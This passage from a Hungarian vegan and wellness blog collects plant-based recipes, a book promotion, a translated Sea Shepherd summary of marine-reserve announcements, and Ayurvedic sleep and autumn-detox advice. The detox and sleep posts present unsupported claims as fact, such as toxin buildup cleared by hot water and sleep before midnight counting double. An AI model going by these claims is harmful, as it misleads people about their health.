(csoki-imádók több kakaóport is használhatnak), majd elkészítjük a növényi zselatint. 1 dl vizet felforralunk, és elkeverünk benne 1 csapott teáskanál agar agar port. Addig keverjük, amíg fel nem olvad a por és el nem készül a zselé. Nem baj, ha felhabzik, folyamatosan kell keverni. A csokikrémet elkezdjük keverni (lehetőleg a turmixgéppel) és így csurgatjuk bele apránként az agar agar zselét. Beletöltjük a tortaformába, elsimítjuk a tetejét, majd hűtőszekrénybe tesszük dermedni. 1 óra múlva már lehet tálalni, szépen összeáll, szépen lehet szeletelni. Az öntet opcionális: nélküle is finom a torta, de vele még különlegesebb :) A piros gyümölcsöket (lehet meggy vagy málna vagy szeder, áfonya, vagy ezek keveréke is, ilyenkor főleg fagyasztott állapotban) elturmixoljuk a banánnal és készen is vagyunk. Tálaláskor szépen ráöntjük a tortára. A nyersétel hétvége egyik fénypontja volt ez a tortaszelet :) :) :)
Sütőtökös csoki tart
Nézd meg ezt a tortát! Szégyentelenül egyszerű recept következik, amihez nem átallottam még félkész alapanyagokat sem felhasználni! ;) Ennek hála az effektív munka vele mindössze 10 perc. Igen. Tíz.
Szóval, ehhez a csodához kellett hat hozzávaló, de annyit már most mondok, hogy ezek egyike se volt cukor. Édesítésnek tökéletesen megtette egy szép sütőtököcske, ha már úgyis Halloween van. :) A sütit nem mellesleg egy versenyre készítettem, ahol adott hozzávalókból kellett dolgozni. Mit mondjak, nagyon izgalmas feladat volt! A végeredmény még nincs meg, de én már most nyertem, mert tele a hűtőm a csupacsoki tortával!
Pihenető alvás - szabadulj meg a krónikus kimerültségtől
2016. október 24. Élj harmóniában
Manapság nagyon sokan küzdenek alvási problémákkal. Ez részben a helytelen életmód, helytelen táplálkozás eredménye, részben a túl sok stressz, az elmében és testben felhalmozódott feszültség miatt van így. A pihentető alvás nem csak azért fontos, hogy energiával feltöltődj és napközben kipihent legyél, de nagyon fontos ahhoz, hogy a tested egészséges legyen. Számos belső szerved éjszaka regenerálódik. Amennyiben nem tudja a szervezted éjszaka megfelelően kipihenni magát, sajnos az csökkenti a belső szervek funkcióit (pl gyengíti a máj, az emésztőrendszer munkáját). Mivel a porckorongok is az éjszakai alvás közben tudnak legjobban regenerálódni, így ha keveset alszol kockára teszed a gerinced egészségét is. Aki nem alszik eleget, annak csökken a stresszel szembeni ellenállóképessége, feszültebb, türelmetlenebb, idegesebb lesz, romlik a koncentrációja, könnyebben lesznek konfliktusai és nehezebben tud teljesíteni a munkahelyén. A lenti néhány jó tanács bevezetése az életedbe, minőségi változást tud eredményezni az alvási szokásaidban és így az elméd és a tested kipihentségében is:) - Lehetőleg 22 óra előtt feküdj le. Amennyiben 22:00-ig le tudsz feküdni, az elősegíti hogy mély, pihentető legyen az alvásod. Ha nem is sikerült 22:00ig lefeküdni, jó ha tudod, hogy az éjfél előtti órák duplának számítanak a szervezeted számára. Azaz hasznos, ha még éjfél előtt tudsz aludni néhány órát. - Az esti étkezés nagyon megterheli a szervezeted és nem támogatja a pihentető alvást. Lehetőleg este 10.00 után már ne egyél. De sose feküdj le teli gyomorral. Az esti étkezés és a lefekvés között minimum 1,5 óra teljen el. - Este már csak könnyű vacsorát fogyassz. és minél közelebb vagy a lefekvés időpontjához, annál könnyedebb legyen az étkezésed. A nehezebb ételek éjszaka is munkára fogják a szervezeted és reggel fáradtan ébredsz. A vacsora legyen egyszerű zöldségekből és gabonából álló fogás.Figyeld meg ha estére húst, tojást, halat, sajtot, túrót fogyasztasz milyen az energiaszinted ébredéskor és figyeld meg ha könnyű vegetáriánus vacsorát fogyasztasz, hogyan ébredsz másnap:) - Az esti alvás elősegítésére,olyan tevékenységeket csinálj lefekvés előtt, amik segítik lenyugtatni az elmét és a testet és felkészítenek az alvásra. Azaz este lehetőleg ne nézz tv-t, ne olvass izgalmas könyvet, ne számítógépezz, mert ezek nem a nyugalmat, az alvást készítik elő, hanem felpörgetik a szervezeted és könnyen eredményeznek nyugtalanságot. - Meditálj rendszeresen, ez segít megszabadulni a feszültségektől. - Lefekvés előtt közvetlenül, olyan italokat igyál amik nyugtatóak (vata tea, meleg tej kurkumával, citromfű tea...) - A hálószobád légköre mindig legyen nyugodt, kellemes, rendezett. Csak alvásra használd a hálószobádat és ne végezz ott másfajta tevékenységeket. - Lefekvés előtt mindig jól szellőztesd ki a hálószobádat, a friss levegő majd segíti a nyugodt alvásod. - Amennyiben éjszaka nem tudsz aludni, akkor se kezdj valami aktív tevékenységbe - pl. ne dolgozz a számítógépen. Próbálj pihenni, igyál egy finom gyógynövényes teát, lélegezz tudatosan és szépen lassan hagyd, hogy újra elnyomjon az álom. - Az ébredést reggel időzítsd lehetőleg 6, 7 óra előtti időpontra. Az ájurvédában ez az ébredésre a legjobb időszak Figyeld meg magadon, ha tovább alszol pl. 8,9 körül kelsz fel sokkal tompább, nehézkesebb leszel egész nap. Szép álmokat kívánok:) szeretettel: Kati .
Könyajánló – Gellért Ferenc: Táplálkozás és tudatfejlődés
MEGJELENT!
Gellért Ferenc: Táplálkozás és tudatfejlődés
http://megismeres.hu/konyvek/taplalkozas-es-tudatfejlodes
***
Ki gondolná, hogy az emberiség étrendje mindig is a tudat fejlődéséhez igazodott? Ki gondolná például a tejről és a húsról, hogy fogyasztásuk révén hozzájárultak a jelenlegi tudatállapot kialakulásához? Miként? E vaskos és különleges kötetből kiderül.
Miért vagyunk a Földön? Végső soron tudati fejlődésünk érdekében. A könyv lapjain az étrend történeti változásaihoz kapcsolódva fel is tárulnak az emberi tudatállapot eddigi állomásai, sőt az élet értelme és jövőbeli lehetőségeink is - modern, antropozófiai ismeretek alapján.
Kevesen tudják, hogy a tudatos és a helyes táplálkozás kialakításához nem elég tisztában lenni az ételek kémiai összetételével és kalóriatartalmával. Az élelmiszerek életfolyamatokat ösztönző hatásai fontosabbak. Sőt, bizonyos tápanyagok a gondolkodásmódot, az érzületet és az akarat kibontakoztatását is sajátosan képesek befolyásolni, amit étkezéseinknél figyelembe vehetünk.
Aki tehát azt hiszi, hogy ez is csak olyan táplálkozási könyv lehet, mint a többi, óriási tévedésben van. Ugyan szó esik benne szokásos témákról, de szokatlan megközelítésben. Szó van benne fehérjékről, szénhidrátokról, gyümölcsökről, zöldfélékről, húsevésről, nyers és hőkezelt ételekről, enzimekről, vitaminokról, lúgosításról, fogyásról és még sok mindenről, ám szellemi megvilágításban és általában a tudatfejlődés fényébe állítva.
Az új ismeretek és a csodálatos összefüggések befogadása közben olyan érzésünk támadhat, hogy szinte kitágul velünk a világ. Mintha egyszerre három művet olvasnánk:
– az emberiség tudatfejlődésének történetét,
– a vele összefüggő táplálkozás történetét,
– valamint az élelmiszerek életfolyamatokat és tudatot befolyásoló hatásait tárgyaló könyvet.
A spirituális szemléletre nyitott olvasó nemcsak hasznos, hanem lelkesítő, szellemi erőt adó információkkal is gazdagodhat általa. Bátran ajánlom tehát írásomat annak, akit vagy az anyagcsere rejtélyei, vagy a helyes étrend, vagy az élelmiszerek tudati hatásai, vagy a lélek tudatfejlődése és szellemi felemelkedése érdekel. Akit pedig e témák közül több is foglalkoztat, annak ez kötelező olvasmány.
***
FACEBOOK MEGOSZTÁS: 10 % KEDVEZMÉNY az 1. megrendelt könyvre: http://megismeres.hu/konyvek/taplalkozas-es-tudatfejlodes
A Facebookon itt találod, innen tudod megosztani:
https://www.facebook.com/taplalkozasestudatfejlodes/photos/a.218556488565348.1073741829.188458151575182/218556195232044/?type=3&theater
Köszönjük ha megosztod, ha hírét viszed a könyvnek!
Mentés
Mentés
Teff őszi ízekben
A teff egy gluténmentes gabona, amely leginkább Etiópiában terem. Érdekessége, hogy a legkisebb gabona. Kálciumtartalma magas, 180 mg/100g, emellett foszfor, vas és cinkben is gazdag, s mint a legtöbb gabona, úgy a teff B-vitamin tartalma is jelentős. Népszerűsítésére egy finom reggeli kását hoztam belőle őszi ízekben. Füge, dió, szőlő teszi nagyon finommá. Állaga és íze a teljes őrlésű búzadarából készült tejbegrízre emlékeztet, éppen csak gluténmentes és kevésbé hízlal.
A recept
Hozzávalók:
- 15 dkg teff
- 2-3 dl növényi tej (nekem szójatej volt otthon)
- 2-3 füge
- 1 kisebb fürt szőlő
- pár szem dió
Elkészítés:
A teff gabonát annyi tejben, ami jól ellepi, puhára főzzük. Úgy is elkészíthetjük, hogy felforralt növényi tejet (vagy vizet) öntünk a teffre és állni hagyjuk.Kb. 20 perc alatt szívja magába a folyadékot. Ha még édesebben szeretnénk, édesíthetjük összezúzott banánnal, bár a füge és a szőlő meglehetősen édes gyümölcsök. A gyümölcsszemeket a tetejére helyezzük és dióval díszítjük. Komplett tápanyagokban gazdag reggeliben lesz részünk.
Almalekvár cukor nélkül
2016. október 7. Éltető ételek
Sokan nem is gondolják, hogy bizony almából is lehet lekvárt készíteni. Ez önmagában is nagyon finom, tojáspótlóként is használhatod, de a hozzátáplálás során a babád is kaphatja. Természetes édesítőszer, a reggeli kásába is nyugodtan kerülhet. Tehát egy igazán univerzális lekvár, fél éves kortól 100 éves korig bárki eheti. Hozzávalók: - édes alma (pl. golden, gála, jonagold) - kevéske víz - ízlés szerint: fahéj Az alma jótékony hatását és a lekvár elkészítési módját ITT olvashatod.
Sütőtök lime-mal és zöldchilivel
A vegetarianizmus világnapja alkalmából a hétvégén állatpajtás felfedezéseimet szeretném megosztani az olvasókkal: a golden retriever szilárd halmazállapotú létforma. A trafóháztól vagy a csatornafedőtől az különbözteti meg, hogy a ,,hárrárárárrrr hangsor gyakori ismételgetésére a ,,beű! fonémával felel. A golden retriever nem balalajka. Ezt azzal tudom alátámasztani, hogy valahányszor megpróbálom eljátszani rajta a Smoke On The Water kezdőtémáját, elszalad. Utóbbi mellesleg nem volt benne a használati utasításában, sőt, ezt a tényt előző gazdája is gerinctelen módon elsunnyogta előlem. A vizsgálat alapját képező, tizenkét éves példány tulajdonságai alapján azt mondhatom, hogy a golden retriever vidéki nagymama: nem túl jó illatú, erősen őszül és üdvözléskor hajlamos nagy kiterjedésű nyálfoltot hagyni az ember arcán. Zsebpénzt viszont állítólag csak igen indokolt esetben ad.
Most pedig egy olyan témát szeretnék taglalni, melyben a golden retriever - szerencsére - deficitet képez. Ellentétben mondjuk a sütőtökkel. Ennek szellemében a hozzávalók:
1 kg sütőtök 1 tk szegfűbors 2 tk kardamommag 2 db kisebb lime 1/2 lime leve 1/2 zöldchili vagy hegyes erőspaprika 1dl növényi joghurt 1 csokor koriander A sütőt előmelegítjük 200 fokra. Közben a sütőtököt vertikálisan kettévágjuk, majd miután a közepét kikanalaztuk, horizontálisan 2-3 centi vastagra szeleteljük. A kardamommagokat egy ún. mozsár nevű szerkezetben összetörjük, héjukat pedig könyörtelenül kidobjuk. A kardamom hasznos részét egy edénybe öntjük a szegfűbors társaságában, és összekeverjük 3 ek olívaolajjal. A lime-okat értetlenkedve meghámozzuk, kisebb gerezdekre szeleteljük, majd egy másik edényben minimális só társaságában szintén fellocsoljuk egy kevés olívaolajjal. A joghurthoz hozzáadjuk a lime levét, egy kevés sót, és hagyjuk békében nyugodni. A tököt egy ecset jóvoltából, segítségével és hozzájárulásával megkenjük a kardamomos-szegfűborsos olívaolajjal, és húsz percre sütőbe tesszük egy alufóliával bélelt tepsiben. Ha megsült, ellentmondást nem tűrően kivesszük, ráöntjük az olívaolajas lime-ot, pár szelet zöldchili, majd végül az esztétikai élményt az egekbe fokozandó joghurttal és korianderrel dekoráljuk.
Őszi tisztítókúra, méregtelenítés az ájurvéda segítségével
2016. szeptember 28. Élj harmóniában
A szervezeted, ahogy Te magad is, néha elfárad és szüksége van pihenésre, regenerálódásra. Ezért időről, időre igényli, hogy tehermentesítsd, megtisztítsd. A szervezet tisztítására az ájurvéda szerint a legideálisabb időszak a tavasz és az ősz. Ha megnézzük az ősi kultúrákat a szervezet megtisztításának ideje nagyjából egybe is esett ezen évszakokkal pl. Ramadán (ősz), Húsvét (tavasz). A helytelen táplálkozás, a kapkodó életmód és a sok stressz következtében sajnos az emésztés tüze (agni) csökken és a gyengébb emésztés nehezebben tudja feldolgozni a bekerült olyan táplálékokat, melyek nem tiszta minőségűek (konzervek, tartósítószerek, vegyszerek, állott ételek, félkész ételek etc.), így sok méreganyag (ama) halmozódik fel a szervezetben. Az ama helytelen életmód és helytelen táplálkozás következtében a testben lerakódott méreganyagok összefoglaló neve, melyek elzárják a test energiacsatornáit és számos problémához, betegséghez vezetnek. Felhalmozódott méreganyagok jelei A méreganyagok lerakódásának jelei: romlik a közérzet, nehezebbé válik az emésztés (puffadás, görcsök, székrekedés, hasmenés), a testben elakadások, dugulások jelennek meg (pl. székrekedés, arcüregek telítettsége) reggel kimerülten ébredünk, napközben is fáradtnak és elnehezültnek érezzünk magunkat, csökken a koncentrációs képességünk, könnyen válunk kedvetlenné, gyengül az immunrendszer, aminek a hatására rendszeresen megbetegszünk, könnyen elkapunk minden betegséget, megváltozik az íz érzékelésünk, szellemileg is tunyábbá válunk. Ájurvédikus megtisztulás Az őszi méregtelenítést azért hasznos, mert a nyár folyamán felhalmozódott meleg hatására ősszel a szervezet könnyen elkezdi kioldani a testünkből a méreganyagokat. Ezt a természetes folyamatot nagyon jó ha megtámogatod egy kis méregtelenítő kúrával. Egy kis tisztítókúra után a szervezeted új életre kel és be tudja indítani a megfelelő öngyógyító folyamatokat és a testet friss energiával tudja ellátni. A lenti méregtelenítési módszerek közül ha csak néhányat tudsz beépíteni az életedbe, bár akkor is nagyon jó eredményt fogsz elérni és a tested frissebb, energikusabb lesz. Az ájurvédában a leghatékonyabb tisztítás a Panchakarma kezelés, de otthon is nagyon sokat tehetsz néhány egyszerű módszerrel azért, hogy megtisztítsd a szervezeted. Az ájurvéda kíméletesen, megfelelő kezelésekkel és méregtelenítő gyógynövény készítményekkel, életmódbeli és táplálkozási módszerekkel segíti elő felhalmozódott méreganyagok eltávolítását a szervezetből. Az ájurvéda segítségével könnyedén és természetes módon tudsz megszabadulni a lerakódott szennyeződésektől és újra visszanyerheted energiádat, jókedvedet, jó emésztésedet, étvágyadat. Ehhez elegendő már egy 10 napos kúra is. A lehető legjobb eredmény eléréséért érdemes alkalmazkodnod a természet változásaihoz és változtatni az évszakváltásnak megfelelően az életmódodon, napirendeden, étkezési szokásaidon. Kerüld el a további méreganyag felhalmozódást Első lépésként kerüld el azokat a szokásokat, melyek méreganyagot (,,ama-t termelnek) * Túlevés vagy úgy enni, hogy az előző étkezést még nem emésztetted meg * Túl hideg ételek és italok fogyasztása * Nehéz, zsíros, cukros ételek és a túlzásba vitt húsfogyasztás * Rendszertelen étkezés * Túl gyors, kapkodó étkezés * Olyan étkezés, amikor nincs a figyelmed az étkezésen (pl. közben olvasol) * Túlevés és késő esti étkezés * Nem friss , vegyszeres(nem bio) , génmanipulált, feldolgozott ételek, tartósított élelmiszerek, konzervek, gyorsfagyasztott ételek * Dohányzás és alkoholfogyasztás * Mozgásszegény életmód Méreganyagok kioldása A legjobb a lerakódott ama felszámolására a meleg víz. Forralj fel reggel tiszta minőségű vizet (pl forrásvíz) kb 10-15 percig - tehetsz bele gyömbért is. A vizet melegen kortyolgasd a nap során lehetőleg fél óránként kis kortyot - a vizet tartsd termoszban, hogy meleg maradjon. Jól támogatja a méregtelenítést, ha reggelenként egy pohár meleg citromos vízzel indítod a napod. Használhatsz ájurvédikus méregtelenítő készítményeket is, melyek olyan gyógynövényekből állnak, amik segítenek kioldani a lerakódásokat. A méregtelenítéshez a készítményeket mindig egyéni alkatodnak megfelelően válaszd ki, szükség esetén kérj segítséget hozzáértőtől.( szívesen ajánlok is akár számodra megfelelő minőségű készítményeket, melyeket én 15 éve alkalmazok) Pörgesd fel az emésztésed Ahhoz, hogy az emésztésed erejét növeld, fogyassz könnyű, lédús ételeket. A méregtelenítés alatt kerüld el a zsíros, savanyú, olajban sült ételeket, tejtermékeket, húst, nyers gabonákat, édességeket, nassolást. Étkezés legyen mindig friss és könnyű, de tápláló. Mit fogyassz? jótékony ilyenkor a baszmati rizs, párolt zöldségek, nagyon kevés nyers saláta, mungbab, zöldségleves, ghí, friss párolt gyümölcsök, levesek. Segítsd az emésztésed fűszerekkel: gyömbér, kurkuma, koriander, római kömény, édeskömény, hosszúbors, fekete bors. Ha teheted, a reggelit hagyd ki vagy csak valami könnyűt fogyassz. Az ebéd legyen ízletes, meleg étel és ne túl nagy mennyiség. A vacsorát ha tudod hagyd ki, ha nem akkor szintén nagyon könnyű étkezés legyen pl.: zöldségleves, rizsleves. Étkezési szabályok * Mindig nyugodt körülmények között egyél * Rendszeres időkben egyél, és délben legyen az ebéd * Ülve nyugodtan egyél, soha ne kezdj idegesen enni * Annyit egyél, amennyi jólesik, táplálkozz mértékletesen (legfeljebb háromnegyedig töltsd meg a gyomrod) * Étkezés közben ne beszéljünk, csak az étkezésre koncentrálj * Ne egyél amíg az előző ételt nem emésztetted meg (3-6 óra) * Étkezés után maradj kicsit még nyugodtan ülve Szánj időt a pihenésre A test számára igazi pihenés három esetben tud létrejönni. Alvásnál, rlaxációnál és meditációnál. Az ősz amúgy is a Vata minőségét hordozza, ilyenkor az időjárás szelesebb, hűvösebb, ami könnyen kimeríti a szervezted, idegességhez, alvászavarokhoz, emésztési problémákhoz vezethet, A vata kiegyenlítéséhez és a méregtelenítéshez több alvásra van szükséged. Hagyj időt a pihenésre, napközben is tarts szüneteket - menj ki sétálni a friss levegőre. Ne éjszakázz, feküdj le időben, lehetőleg este 22:00-ig és lehetőleg 06:00 előtt kelj fel. Távolítsd el a feszültséget az elmédből és a testedből. Naponta végezz relaxációt. Ingyenesen letölthető relaxációt, ezen az oldalon találod: http://eljharmoniaban.blogspot.hu/2015/06/relaxacio-hatekony-stresszkezeles.html Tanulj meditálni és szánj időt minden nap arra, hogy kikapcsold a külvilág zajait és a meditációban megtapasztald a belső csendet, harmóniát. Végezz könnyed testmozgást Naponta mozogj, sétálj, jógázz. Ájurvédikus testalkatodnak megfelelő könnyed mozgásformát válassz. A méregtelenítési időszakban célszerű olyan jógagyakorlatokat (ászana) végezned, melyek segítik az emésztő tűz felélesztését és a méreganyagok eltávolítását a szervezetből. Önmasszázs Minden nap végezz ájurvédikus önmasszázst (az ízületeknél körkörös a csontos részeknél hosszanti mozdulatokkal), amely fellazítja a szervezetedben lerakódott méreganyagokat. A masszázshoz a legjobb, ha érlelt szezámolajat használsz, de bármilyen alkatodnak megfelelő olaj is jó. Az önmasszázs után alaposan zuhanyozz le meleg vízzel. Az önmasszázs részletes leírását itt találod: http://eljharmoniaban.blogspot.hu/2016/03/hogyan-vegezz-otthoni-ajurvedikus.html Száj és nyelv tisztítás Építsd be a mindennapjaidba az ájurvéda száj és nyelvtisztítását. A szervezet sok méreganyagot halmoz fel a szájüregben és a nyelven lepedék formájában. Ennek a rendszeres, megfelelő eltávolítása fantasztikusan tisztítja a szervezeted. A nyelvtisztításról részletesen itt olvashatsz: http://eljharmoniaban.blogspot.hu/2016/01/szajhigienia-meregtelenites.html Érzelmi méregtelenítés Ne feledkezz meg arról sem, hogy a negatív érzelmek és az elfojtott érzelmek szintén méregeket hoznak létre a szervezetedben. Próbálj megszabadulni a negagítv érzéseidtől, neheztelésektől, haragtól, dühtől, aggodalmaktól, félelmektől. Alakítsd át a negatív érzelmeket pozitív érzésekké és tanuld meg a negatív érzéseket elengedni. Ehhez nagyon nagy segítség, ha jógafilozófiát tanulsz, mert megérheted hogyan működik az elméd és hogyan tudsz megszabadulni a negatív gondolatoktól, érzésektől. Az érzelmi méregtelenítésről egy későbbi cikkben írok majd részletesebben. A méregtelenítés utáni időszak A méregtelenítés eredményeképpen elmúlik a testből a nehézségérzet, energikusabb, könnyedebb leszel, esetleg megszabadulsz néhány felesleges kilótól is:) A méregtelenítés utána próbálj az étkezési szokásokból minél többet hosszútávon is fenn tartani. Fokozatosan térj vissza a nehezebb étkezésekhez, hogy ne terheld túl a megtisztított szervezeted. Tartsd fenn a testalkatodnak megfelelő testmozgást is rendszeresen. A méregtelenítés utáni időszak a legalkalmasabb életerőt, vitalitást fokozó készítmények fogyasztására. Az ilyen készítmények (rasayanák) fogyasztását mindig tisztulási folyamat befejeztével kezd el. Amennyiben a szervezet nem tiszta és az energiacsatornákat eltorlaszolják a méreganyagok a legértékesebb, legcsodásabb roboráló szer sem tud megfelelően eljutni a sejtekhez és nem tudja kifejteni áldásos hatásait. Mindenkinek kívánok tisztább,energikusabb szervezetet, erősebb immunrendszert :)
Fontos bejelentések az Óceánok konferenciájáról
2016. szeptember 25. Vegán lettem
A Sea Shepherd Hungary nemrég fordította le Paul Watson kapitány összefoglalóját, amely az Óceánok konferenciáján elhangzottakat összegzi. A szöveget változtatás nélkül olvashatjátok.
A több ízben kalózoknak titulált globális Sea Shepherd mozgalom ugyan nem képviseltethette magát az Óceánok konferenciáján, de vezetőjük Paul Watson kapitány összefoglalta a tengeri élővilág védelmének szemszögéből leglényegesebb bejelentéseket. A fordított szöveget változtatás nélkül emeltem át a Sea Shepherd Hungary beleegyezésével.
“Nagy örömmel fogadtuk az Óceánok konferenciáján – Washington DC-ben – Leonardo DiCaprio bejelentését, miszerint rendelkezésre áll a technológia, amellyel lokalizálhatók az illegális halászati műveletek!
Üdvözülünk minden bejelentést és ígéretet, melyet több mint 20 ország és NGO szervezet tett a tengeri ökoszisztéma védelmének szándékával! A Sea Shepherd gratulál mindazoknak, akik a múlt héten a következő bejelentéseket tették:
Paul Watson Kapitány kommentárja:
1. Az USA bejelentette a Papah?naumoku?ke Tengeri Nemzeti Park kiterjesztését Hawaii partjainál, további 1,146,798 km2, létrehozva a világ legnagyobb tengeri védett övezetét, állandó védelem alá helyezve ezzel az ősi korallzátonyokat, mélytengeri élőhelyeket, és fontos ökológiai erőforrásokat.
2. Az USA ugyancsak bejelentette, hogy létrehozz egy újabb, 12,725 km2 területű tengeri nemzeti parkot, a New England Canyons-tól Seamounts-ig.
3. Seychelles-szigetek bejelentette szándékát egy 400.000 km2-es természetvédelmi zónára, melynek megvalósítását 2020-ra tűzte ki.
4. Nagy Britannia bejelentette egy fenntartható módon használandó tengeri természetvédelmi zónának kijelölését St. Helena teljes, 445.000 km2-es körzete és a Pitcaim szigetek körül.
5. Nagy Britannia ugyancsak bejelentette az Ascensin-szigetek körüli tengervédelmi zóna tervezetét, első szakaszban 220.000 km2-es terület deklarálását 2019-ig, kötelezettséget vállalva egy szervezet létrehozására, mely a teljes, 750.000 km2-es terület védelmét látja el. Továbbá ígéretet tett arra, hogy az elkövetkező 4 évben 22 millió USD-t (10 millió EUR-t) fordít az újonnan deklarált tengervédelmi területek fejlesztésére, fenntartására és felügyeletére.
6. Mikronéziai Szövetségi Államok bejelentette elkötelezettségét arra, hogy 24 tengeri mérföldesre terjessze ki tengervédelmi zónáját minden szigete körül, ahol megtiltja a gazdasági halászatot, ez további 184.948 km2-es területet jelent!
Kanada megerősítette elkötelezettségét arra vonatkozó elkötelezettségét, hogy betartsa tengervédelmi vállalásait, beleértve azt is, hogy 2017-ig a kanadai partvonal és tengereinek 5%-át, 2020-ig pedig 10%-át védelem alá helyezi. Továbbá a Maine-öböl tengerfenéki ökoszisztémájának védelmében, összesen 9.000 km2-es területről felszámolják a halászati telepeket. Az új védelmi intézkedések részei az Atlanti-óceánon tervezett, összefüggő, Anguniaqvia Niqiqyuam Tengeri Védett Zóna létrejöttének Kanada Jeges-tengeri és Csendes-óceáni területén, összesen több mint 58,121 km2-en!
7. Ecuador bejelentette egy nem-kiaknázható tengeri védett terület, kijelölését a a Galápagos-szigeteki tengervédelmi területen belül, mely megtiltja a halászatot további 40.000 km2-es területen, a szigetcsoport északi tagjai - Darwin és Wolfon - körül, mely egyúttal bolygónk leggazdagabb cápa-élőhelyének védelmét is jelenti!
8. Kambodzsa bejelentette az első, 415 km2-es tengervédelmi területének létrehozását, a Koh Rong Szigetvilágban.
9. Palau beszámolt a 2014-ben kezdeményezett nemzeti tengervédelmi területének létrehozásáról, mely megtilt mindennemű kiaknázást - beleértve a bányászati és a külföldi halászati tevékenységet a terület 80%-án, míg a maradék 20%-on kizárólag palaui halászati tevékenység folytatható, Palau lakosságának élelmiszer-ellátásának biztosításául.
10. Kolumbia bejelentette, hogy megnégyszerezi a Malpelo Flora and Fauna Sanctuary területét, ez további 20,237 km2-nyi védelmet jelent a világ egyik legnagyobb cápa élőhelyén!
Malajzia bejelentette a 10.000 km2-es, Tun Mustapha Park létrehozását, és egy projektet Park biztonsági rendszerének kiépítésére, amit az Egyesült Államok 250.000 USD-vel, míg a WildAid 50.000 USD-vel támogat.
11. Costa Rica bejelentette, hogy a Cocos-szigeti Nemzeti Park védett vizeit kiterjeszti újabb, kb. 10.000 km2-re, így majdnem megnégyszerezi a területet, mely többek között Fehérfoltú cápák, Cetcápák és Pörölycápák otthona. Málta bejelentette további 9 új tengervédelmi terület létrehozását, összesen kb. 3.450 km2-t jelent, mely többszöröse a 316 km2-nyi szigetország területének.
12. Srí Lanka bejelentette a több mint 292 km2-es Veduthalathiv Rezervátum mellett, további négy új, összesen 800 km2-nyi tengervédelmi zónát tengeri emlősök, koralloknak, vándorló és rezidens madarak számára.
13. Dél-Korea bejelentette újabb, 91,2 km2-es tengervédelmi terület kijelölését, ezúttal a Garimon öbölben, mely egyike a két régiónak, ahol veszélyeztetett státuszú, koreai pettyes fókák élnek, továbbá fontos ívó helye több hal fajnak. Ez a 25. dél-koreai tengervédelmi terület! Az ázsiai ország vállalta, hogy 2020-ig elérik a 32-t!
14. Thaiföld bejelentette egy 10 km2-es védett zóna létrehozását a Trat-öbölben élő delfinek számára, melyet a későbbiekben kiterjeszthetnek az öböl teljes, kb. 880 km2-nyi területére, védelmet biztosítva a dugongoknak és élőhelyeinek, beleértve egy tengeri emlős mentőközpont megnyitását Phuketben 2017-ig, valamint 2020-ig egy 400 km2-es Dugong Védelmi Zóna létrehozását Trang tartományban.
15. Marokkó 3 tengervédelmi terület létrehozását jelentette be, összesen 775 km2-nyi területen, Marokkó atlanti-óceáni és Földközi-tengeri partszakaszain. Továbbá 2018-ig egy negyediket, ahol tilos lesz a fenékhálós halászat.
16. Norvégia újabb 3 tengervédelmi területet határozott meg, összesen 170 km2-nyi területen.
17. Libanon kifejezte szándékát egy 30 km2-es tengervédelmi terület létrehozására.
18. Monaco bejelentette, hogy 563.000 USD-t (500.000 EUR) biztosít egy új vagyonkezelő alaphoz, Franciaországgal és Tunéziával, mely hosszú távú anyagi hátteret nyújt a mediterrán nemzetek számára, a már meglévő és leendő tengervédelmi zónák fenntartásához.
19. Ausztrália bejelentette, hogy további 41,95 millió USD-t (56,1 millió AUD) biztosít 4 éven át, hogy megerősítse tengervédelmi területeinek működését. Az anyagi támogatás támogatói kutatásokat, a zavartalan működést fogja szolgálni.
20. Srí Lanka még 2016 év végéig egy tengeri teknős-védelmi rezervátumot hoz létre, ahol a sérült teknősök találnak menedékre, gyógyulhatnak és egyben a helyi közösségek oktatási központja is lesz.
21. Franciaország bejelentette az Indiai-óceánon fekvő déli területein deklarált tengervédelmi területeinek 550.000 km2-re bővítését, továbbá szándékát a Clipperton-sziget körül létrehozandó tengervédelmi területre, és elkötelezte magát egy korallvédelmi projektre, mely felségvizeinek, korallállományának 75%-ra terjed ki.
Ezek fantasztikus hírek, azonban egy valamit nem fogalmaztak meg kellőképpen. Egy dolog egy óceáni / tengeri területet védetté nyilvánítani, de teljesen más azokat meg is védelmezni!
Szükséges a politikai és gazdasági motiváció ahhoz, hogy az ígéretek megvalósulhassanak.
A már létező Galápagos-szigeteki Tengeri Rezervátumnak nem sikerül megállítani a kb. évi 300.000 cápa kifogását, ahogy azt sem, hogy visszaszorítsa a növekedő helyi halászatot, mely paradox módon a szigetekre érkező öko-turisták tömegét hivatott élelemmel ellátni...
Costa Rica Cocos-szigete évtizedek óta tengervédelmi rezervátum, de a rosszul felszerelt parkőröknek nincs elegendő erőforrásuk a jelenlegi védendő területek felügyelésére sem.
A Sea Shepherd évtizedek óta jelenti az orvhalászati tevékenységek koordinátáit, anélkül hogy bármilyen választ kapott volna a hatóságoktól. Egészen mostanáig! És ez is csak azért változott, mert válaszolniuk kellett arra, hogy mi nagy csinnadrattával üldöztük és szembeszálltunk az orvhalász-bandákkal a nyílt tengereken.
Indonézia és Chile radikális intézkedést tett, megsemmisítették az illegális halászhajókat, de máshol az orvhalász-flották gyakorlatilag szinte büntetlenül fosztogatnak, és USD milliárdokat kaszálnak.
A Sea Shepherd erőfeszítései az illegális halászati tevékenységek felszámolására sikeresek, a hiányzó anyagi fedezet és támogatás ellenére. Ugyanakkor hálásak vagyunk és köszönetet mondunk az együttműködő támogatásért Mexikó, Gabon, Ecuador, Olaszország, Sao Tomé és Indonézia haditengerészetének, valamint az Interpol utóbbi időkben végrehajtott együttműködéséért!
És igen vannak intézkedések, de ez nem elég, közel sem elég és még csak nem is eléggé gyorsak.
Óceánjaink haldoklanak! A halak 90% eltűnt. A tengerek egyre szennyezettebbé vállnak kémiai vegyületekkel, műanyaggal, olajjal, radioaktív sugárzással, nem is beszélve a klíma változás hatásairól. A tengeri emlősök és madarak éheznek.
Ezek a bejelentések és kötelezettségvállalások csodálatosak és valóban nagy előrelépésnek számítanak ahhoz képest ami az előző generációk alatt zajlott. Ez bizonyítéka az egyre növekvő aggodalomnak és nem akarjuk ezen vállalások fontosságát csökkenteni.
De meg kell értenünk, hogy önmagukban a vállalások nem teljes értékűek a megoldásokkal! Többet kell tenni, és hamarabb, sokkalta hamarabb!
Az illegális és szabályozatlan halászatot nem olyan nehéz felkutatni, és egyre könnyebb lesz a Mr. DiCaprio által bejelentett technológiával.
Ettől függetlenül, a kulcs a végrehajtásban rejlik, és ez alatt a járőrözés, az elrettentő mértékű büntetések és a korrupció felszámolását kell értenünk!
